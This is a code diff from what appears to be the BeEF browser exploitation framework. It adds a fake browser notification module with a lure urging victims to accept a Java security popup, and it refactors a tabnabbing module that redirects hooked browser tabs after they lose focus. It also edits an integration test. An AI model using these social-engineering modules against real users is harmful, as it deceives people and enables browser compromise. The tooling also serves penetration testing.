+            description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification/module.rb

@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Text displayed in the notification bar',
+        'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/tabnabbing/command.js

@@ -13,14 +13,13 @@ beef.execute(function() {
 	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=waiting for tab to become inactive');
 
 	// begin countdown when the tab loses focus
-	window.onblur = function() {
+	$j(window).blur(function(e) {
 		begin_countdown();
-	}
 
 	// stop countdown if the tab regains focus
-	window.onfocus = function() {
+	}).focus(function(e) {
 		clearTimeout(tabnab_timer);
-	}
+	});
 
 	begin_countdown = function() {
 		tabnab_timer = setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=redirected'); window.location = url; }, wait);

test/integration/tc_debug_modules.rb

@@ -170,7 +170,7 @@ class TC_DebugModules < Test::Unit::TestCase
     data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
     assert_equal 200, JSON.parse(data)["status_code"]
-    assert JSON.parse(data)["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
+    assert JSON.parse(data)["port_status"].include?("open")
 
   end
 end